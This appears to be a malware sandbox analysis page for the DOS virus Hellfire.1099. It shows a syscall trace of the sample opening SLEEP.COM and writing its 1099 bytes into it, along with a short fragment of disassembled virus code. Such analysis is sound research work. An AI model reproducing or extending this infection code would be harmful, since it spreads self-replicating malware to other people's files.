Sample viewer

vx.netlux.org/Virus.DOS.Hellfire.1099

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:34.97473587Z 37 PC: 12a4c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:06:34.976299529Z 78 PC: 12a55 | Find first file
2018-12-17T23:06:34.983451977Z 61 PC: 12a5f | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:34.99046119Z 63 PC: 12a6a | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:34.997187369Z 62 PC: 12a6e | Close file
2018-12-17T23:06:35.000264654Z 61 PC: 12a7f | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:35.007458684Z 44 PC: 12a84 | Get time 0x12a84: mov word ptr [0x547], dx
0x12a88: mov ah, 0x40
0x12a8a: push ax
0x12a8b: mov cx, 0x44b
0x12a8e: push cx
0x12a8f: mov dx, 0x100
0x12a92: jmp 0x12e6a
0x12a95: mov ah, 9
0x12a97: mov dx, 0x1e0
0x12a9a: int 0x21
0x12a9c: int 0x20
0x12a9e: mov ah, 0xf
0x12aa0: int 0x10
0x12aa2: xor ah, ah
0x12aa4: int 0x10
0x12aa6: mov ah, 1
0x12aa8: mov cx, 0x2607
0x12aab: int 0x10
0x12aad: mov ax, 0xb800
0x12ab0: mov es, ax
2018-12-17T23:06:35.009871858Z 64 PC: 12e70 | Write file or device (Write 1099 bytes on handle 5)